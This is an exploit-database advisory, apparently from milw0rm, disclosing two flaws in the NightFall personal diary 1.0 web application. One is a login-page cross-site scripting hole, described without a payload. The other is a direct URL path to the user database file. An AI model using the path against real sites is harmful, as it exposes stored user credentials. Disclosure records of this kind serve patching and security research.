nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure

Author: AlpHaNiX
type: webapps
platform: php
port: 
date_added: 2008-12-04 
date_updated:  
verified: 1 
codes: OSVDB-50523;CVE-2008-5592;OSVDB-50522;CVE-2008-5591 
tags: 
aliases:  
screenshot_url:  
application_url: 

###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


---------------------------- Tunisian Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org

#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : NightFall
#download : http://iwrite.brinkster.net/nightfall.zip



#Exploits :

--=[XSS]=--
in the login page /login.asp write in the login fields your evil codes


--=[Database Disclosure]=--
http://target.com/db/users-zza21.mdb



#special thanks for syst3m and crimeirc staff

###########################################################################

# milw0rm.com [2008-12-05]